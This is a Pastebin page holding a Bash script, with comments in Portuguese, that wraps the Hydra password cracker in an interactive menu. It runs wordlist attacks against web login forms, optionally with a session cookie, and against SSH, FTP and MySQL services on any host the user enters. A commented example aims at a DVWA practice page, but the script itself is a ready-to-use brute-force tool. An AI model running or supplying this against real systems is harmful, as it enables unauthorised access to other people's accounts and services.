Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Observacao (exemplo do Comando GET)
- # hydra -L user.txt -P pass.txt 192.168.0.19 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=f5dt3o4blpdfanrgsgjnv15ls6" -t4 -V---------------------
- ---------------------
- * DarkProgrammer000 *
- ---------------------
- # Funcao: Formulario POST
- Post()
- {
- metodo="http-post-form"
- echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
- echo -e "\033[01;32m Wordlist [usuarios]: user \033[00;37m"
- echo -e "\033[01;33m Wordlist [senhas]: pass \033[00;37m"
- echo -e "\033[01;34m Host: www.exemplo.com \033[00;37m"
- echo -e "\033[01;35m Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
- echo -e "\033[01;36m Campo [nome]: username \033[00;37m"
- echo -e "\033[01;37m Campo [senha]: password \033[00;37m"
- echo -e "\033[01;31m Saida de erro: 'senha invalida' \033[00;37m"
- echo -e "\033[01;32m Erro: 'senha invalida' \033[00;37m"
- echo -e "\033[01;30m -------------------------------------- \033[00;37m"
- echo ""
- echo -e -n "\033[01;32m + Wordlist (usuarios): \033[00;37m"
- read usuarios
- echo ""
- echo -e -n "\033[01;33m + Wordlist (senhas): \033[00;37m"
- read senhas
- echo ""
- echo -e -n "\033[01;34m + Host (Ex: www.site.com): \033[00;37m"
- read site
- echo ""
- echo -e -n "\033[01;35m + Validacao (Ex: /admin/validar.php): \033[00;37m"
- read validacao
- echo ""
- echo -e -n "\033[01;31m + Campo login (Ex: usuario): \033[00;37m"
- read user
- echo ""
- echo -e -n "\033[01;32m + Campo senha (Ex: senha): \033[00;37m"
- read pass
- echo ""
- echo -e -n "\033[01;33m + Saida de erro (Ex: invalido): \033[00;37m"
- read erro
- echo ""
- echo ""
- echo -e "\033[01;31m Informar Cookie: \033[00;37m"
- echo -e "\033[01;32m [1] Sim \033[00;37m"
- echo -e "\033[01;33m [2] Nao \033[00;37m"
- echo ""
- echo -e -n "\033[01;34m + Opc: \033[00;37m"
- read resp
- # Estrutura em escolha
- case $resp in
- 1)
- echo -e -n "\033[01;35m Cookie (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
- read cookie
- # Hydra (com cookie)
- hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro:H=$cookie" -V -t4
- ;;
- 2)
- # Hydra (sem cookie)
- hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro" -V -t4
- ;;
- *)
- ;;
- esac
- }
- # Funcao: Servicos
- Services()
- {
- echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
- echo -e "\033[01;32m Wordlist [usuarios]: user \033[00;37m"
- echo -e "\033[01;33m Wordlist [senhas]: pass \033[00;37m"
- echo -e "\033[01;34m Host: www.exemplo.com \033[00;37m"
- echo -e "\033[01;30m -------------------------------------- \033[00;37m"
- echo ""
- echo -e -n "\033[01;34m + Host (Ex: www.site.com ou IP): \033[00;37m"
- read ip
- clear
- echo -e "\033[01;33m ---------------- \033[00;37m"
- echo -e "\033[01;33m Services \033[00;37m"
- echo -e "\033[01;33m ---------------- \033[00;37m"
- echo ""
- echo -e "\033[01;32m [1] SSH \033[00;37m"
- echo -e "\033[01;33m [2] FTP \033[00;37m"
- echo -e "\033[01;34m [3] MYSQL \033[00;37m"
- echo ""
- echo -e -n "\033[01;35m + Opc: \033[00;37m"
- read escolha
- echo ""
- # Estrutura em escolha
- case $escolha in
- 1)
- # Comando: ssh
- hydra -L user -P pass $ip ssh -t4 -V;;
- 2)
- # Comando: ftp
- hydra –L user -P pass $ip ftp -t4 -V;;
- 3)
- # Comando: mysql
- hydra –L user -P pass $ip mysql -t4 -V;;
- *) ;;
- esac
- }
- ####################
- ##### PROGRAMA #####
- ####################
- clear
- echo -e "\033[01;33m ------------- \033[00;37m"
- echo -e "\033[01;33m Hydra \033[00;37m"
- echo -e "\033[01;33m ------------- \033[00;37m"
- echo ""
- echo -e "\033[01;32m [1] Formulario (POST) \033[00;37m"
- echo -e "\033[01;34m [2] Services \033[00;37m"
- echo ""
- echo -e -n "\033[01;35m + Opc: \033[00;37m"
- read escolha
- echo ""
- # Estrutura em escolha
- case $escolha in
- 1) Post;;
- 2) Services ;;
- *) ;;
- esac
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement